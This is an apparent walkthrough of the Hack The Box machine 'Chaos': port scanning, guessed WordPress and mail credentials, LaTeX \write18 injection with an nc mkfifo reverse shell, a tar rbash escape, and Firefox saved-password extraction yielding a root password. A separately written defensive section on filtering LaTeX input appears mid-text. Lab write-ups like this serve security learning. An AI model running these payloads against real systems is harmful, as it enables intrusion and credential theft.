HTB: Chaos


This machine is Chaos from Hack The Box


root@kali:~# nmap -T4 -sV
Nmap scan report for
Host is up (0.033s latency).
Not shown: 994 closed ports
80/tcp    open  http     Apache httpd 2.4.34 ((Ubuntu))
110/tcp   open  pop3     Dovecot pop3d
143/tcp   open  imap     Dovecot imapd (Ubuntu)
993/tcp   open  ssl/imap Dovecot imapd (Ubuntu)
995/tcp   open  ssl/pop3 Dovecot pop3d
10000/tcp open  http     MiniServ 1.890 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 43.87 seconds

Gaining User

First the port 80 webserver at

Screenshot 1

Then the port 10000 server

Screenshot 2

I tried the https version at

Screenshot 3

I added an exception for the SSL cert

Screenshot 4

No creds for this yet, so I set up dirbuster against the port 80 webserver

Screenshot 5

Screenshot 6

I went to wp and it led to a WordPress site at ; the only post was by the user "human"

Screenshot 7

So I tried "human" as the password

Screenshot 8

I have some creds now


It says they are for webmail, and there are some webmail services exposed

root@kali:~# nc 110
+OK Dovecot (Ubuntu) ready.
USER ayush
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.

It wants me to use the SSL/TLS port. I didn't want to do that from the command line, so I installed a mail client called "Evolution"

root@kali:~# apt install evolution -y

I added the account to Evolution, using the creds found before and IMAP as the connection type. Once the account was set up I clicked "receive all"

Screenshot 9

So I inspected the email

Screenshot 10

It says "you are the password", so I guessed the password was


I downloaded the attachments and looked at the encryptor

root@kali:~# cat
import os
import hashlib
from Crypto import Random
from Crypto.Cipher import AES

def encrypt(key, filename):
    chunksize = 64*1024
    outputFile = "en" + filename
    filesize = str(os.path.getsize(filename)).zfill(16)  # 16-byte ASCII size header
    IV = Random.new().read(16)  # assumed: the IV setup was lost from the listing
    encryptor = AES.new(key, AES.MODE_CBC, IV)
    with open(filename, 'rb') as infile:
        with open(outputFile, 'wb') as outfile:
            outfile.write(filesize.encode('utf-8'))  # assumed: header then IV, as in the common script
            outfile.write(IV)
            while True:
                chunk = infile.read(chunksize)
                if len(chunk) == 0:
                    break
                elif len(chunk) % 16 != 0:
                    chunk += b' ' * (16 - (len(chunk) % 16))  # space-pad to the AES block size
                outfile.write(encryptor.encrypt(chunk))

def getKey(password):
    hasher = hashlib.sha256(password.encode('utf-8'))  # unsalted SHA-256 of the password is the AES key
    return hasher.digest()

Some googling revealed a very similar script on GitHub

So I saved it as and used it

root@kali:~# python
Would you like to (E)ncrypt or (D)ecrypt?:
File to decrypt

A new file showed up called "t"

root@kali:~# cat t

This was base64, which decoded to

Hii Sahay
Please check our new service which create pdf
p.s - As you told me to encrypt important msg, i did :)

At this point I needed to set up /etc/hosts so that chaos.htb would resolve

root@kali:~# echo " chaos.htb" >> /etc/hosts

And went to http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3

Screenshot 11

I fired up Burp to watch what was going on, and submitted "test" and "test1"

Screenshot 12

Then told it to intercept the response

Screenshot 13

test1 returned a fatal error, so I tried test2, which did not. The page was generating LaTeX, so I decided to try injecting some, starting by setting the content to


But got back

BLACKLISTED commands used

So I tried a reverse shell

root@kali:~# nc -nlvp 4444

I was able to get a connection back by injecting

\immediate\write18{nc 4444}
connect to [] from (UNKNOWN) [] 36068

But no shell came back; eventually I managed to get it to work using

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

making sure the & was URL-encoded (as %26) so that it wasn't treated as a parameter separator

\immediate\write18{ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 4444 >/tmp/f }

This led to

connect to [] from (UNKNOWN) [] 36104
/bin/sh: 0: can't access tty; job control turned off

I now had a shell

$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

which I upgraded to a proper tty with

$ python -c "import pty;pty.spawn('/bin/bash')"
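The injection above worked because the server's blacklist was the only thing standing between user-supplied LaTeX and \write18. As an added example (not code from the post or from the target site), here is how a defender would handle the same PDF-generation flow: decode the request body before scanning it for shell and file primitives, and, more importantly, compile with shell escape disabled so \write18 cannot spawn a process even if the filter misses something. The primitive list and the compile settings are my own choices, not taken from the page.

```python
import re
from urllib.parse import unquote_plus

# TeX primitives that reach the shell or the filesystem. The names are the
# keys so the scanner can report what it saw.
DANGEROUS = {
    "write18": r"\\write18\b",      # shell escape; what the post's injection used
    "immediate": r"\\immediate\b",  # makes \write run at once instead of at shipout
    "input": r"\\input\b",          # pulls other files into the document
    "include": r"\\include\b",
    "openout": r"\\openout\b",      # file writes
    "openin": r"\\openin\b",        # file reads
    "read": r"\\read\b",
    "usepackage": r"\\usepackage\b",
    "def": r"\\def\b",              # macro definition primitives
    "let": r"\\let\b",
    "csname": r"\\csname\b",
    "catcode": r"\\catcode\b",
}

def find_dangerous(tex: str) -> list:
    """Names of blacklisted primitives present in a TeX fragment, in list order."""
    return [name for name, pat in DANGEROUS.items() if re.search(pat, tex)]

def check_submission(raw_body: str) -> list:
    """Scan a form body the way the compiler will see it: after URL decoding,
    so an encoded byte (the post used %26 for &) cannot hide a primitive."""
    return find_dangerous(unquote_plus(raw_body))

def compile_cmd(texfile: str) -> list:
    """pdflatex invocation, run from the build directory, with shell escape off.
    This, not the blacklist, is the control that stops \\write18 spawning a process."""
    return ["pdflatex", "-no-shell-escape", "-halt-on-error",
            "-interaction=nonstopmode", texfile]

def compile_env() -> dict:
    """kpathsea variables (honoured from the environment) confining
    \\openin/\\openout to the current directory tree."""
    return {"openin_any": "p", "openout_any": "p"}

if __name__ == "__main__":
    # Constructed sample bodies: one benign, one with the shape of the injection.
    for body in ("content=Hello+%26+welcome",
                 "content=%5Cimmediate%5Cwrite18%7Becho+hi%7D"):
        print(body, "->", check_submission(body) or "clean")
    print(" ".join(compile_cmd("input.tex")), compile_env())
```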

Time to look for users

www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ cat /etc/passwd
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/sbin/nologin
mysql:x:110:115:MySQL Server,,,:/nonexistent:/bin/false
dovecot:x:112:118:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
dovenull:x:113:119:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin

I already had a password for ayush, but it would land me in rbash; let's try it anyway

www-data@chaos:/var/www/main/J00_w1ll_f1Nd_n07H1n9_H3r3/compile$ su ayush

The password was


Which led to


I was now in rbash, but I could break out of it using tar

ayush@chaos:~$ tar cf /dev/null escape --checkpoint=1 --checkpoint-action=exec=/bin/bash
tar: escape: Cannot stat: No such file or directory
bash: groups: command not found
ayush@chaos:/tmp$ ls -la
ls -la
Command 'ls' is available in '/bin/ls'
The command could not be located because '/bin' is not included in the PATH environment variable.
ls: command not found

I was out, but PATH was still broken, so I added the usual directories to it

ayush@chaos:/tmp$ export PATH=/bin:/usr/bin:$PATH
ayush@chaos:/tmp$ cd ~
ayush@chaos:~$ ls -la
drwx------ 6 ayush ayush 4096 Feb  9 02:02 .
drwxr-xr-x 4 root  root  4096 Oct 28 11:34 ..
drwxr-xr-x 2 root  root  4096 Oct 28 12:25 .app
-rw------- 1 root  root     0 Nov 24 23:57 .bash_history
-rw-r--r-- 1 ayush ayush  220 Oct 28 11:34 .bash_logout
-rwxr-xr-x 1 root  root    22 Oct 28 12:27 .bashrc
drwx------ 3 ayush ayush 4096 Feb  9 02:02 .gnupg
drwx------ 3 ayush ayush 4096 Feb  9 17:23 mail
drwx------ 4 ayush ayush 4096 Sep 29 12:09 .mozilla
-rw-r--r-- 1 ayush ayush  807 Oct 28 11:34 .profile
-rw------- 1 ayush ayush   33 Oct 28 12:54 user.txt

There's the user flag

ayush@chaos:~$ cat user.txt

Now For Root

Now for root. The .mozilla directory was unusual

ayush@chaos:~$ cd .mozilla
ayush@chaos:~/.mozilla$ ls -la
drwx------ 4 ayush ayush 4096 Sep 29 12:09 .
drwx------ 6 ayush ayush 4096 Feb  9 02:02 ..
drwx------ 2 ayush ayush 4096 Sep 29 12:09 extensions
drwx------ 4 ayush ayush 4096 Sep 29 12:09 firefox
ayush@chaos:~/.mozilla$ cd firefox
ayush@chaos:~/.mozilla/firefox$ ls -la
drwx------  4 ayush ayush 4096 Sep 29 12:09  .
drwx------  4 ayush ayush 4096 Sep 29 12:09  ..
drwx------ 10 ayush ayush 4096 Oct 27 13:59  bzo7sjt1.default
drwx------  4 ayush ayush 4096 Oct 15 03:59 'Crash Reports'
-rw-r--r--  1 ayush ayush  104 Sep 29 12:09  profiles.ini
ayush@chaos:~/.mozilla/firefox$ cd bzo7sjt1.default
ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ ls -la
-rw-------  1 ayush ayush      570 Oct 27 12:10 logins.json

I took a look

ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ cat logins.json

I wanted to pull creds out of this profile, and found a Python script for it

I transferred it onto the box

root@kali:~# nc -nlvp 2222 <
ayush@chaos:~/.mozilla/firefox/bzo7sjt1.default$ cd /tmp
ayush@chaos:/tmp$ nc 2222 >

Then ran it

ayush@chaos:/tmp$ python ~/.mozilla/firefox
Master Password for profile /home/ayush/.mozilla/firefox/bzo7sjt1.default:

I tried jiujitsu

Website:   https://chaos.htb:10000
Username: 'root'
Password: 'Thiv8wrej~'

and tried to use it to escalate privileges

ayush@chaos:/tmp$ su

And that was root

root@chaos:/tmp# cd /root
root@chaos:~# ls -la
drwx------  6 root root  4096 Dec  9 17:23 .
drwxr-xr-x 22 root root  4096 Dec  9 17:19 ..
-rw-------  1 root root   245 Dec  9 17:24 .bash_history
-rw-r--r--  1 root root  3106 Aug  6  2018 .bashrc
drwx------  2 root root  4096 Nov 22 21:58 .cache
drwx------  3 root root  4096 Oct 28 13:01 .gnupg
drwxr-xr-x  3 root root  4096 Oct 28 10:39 .local
-rw-------  1 root root  1147 Nov 25 00:38 .mysql_history
-rw-r--r--  1 root root   148 Aug  6  2018 .profile
-rw-------  1 root root    33 Oct 28 12:58 root.txt
drwx------  2 root root  4096 Oct 28 09:25 .ssh
-rw-------  1 root root 12630 Dec  9 17:23 .viminfo
-rw-r--r--  1 root root   165 Oct 28 11:12 .wget-hsts

Now the flag

root@chaos:~# cat root.txt
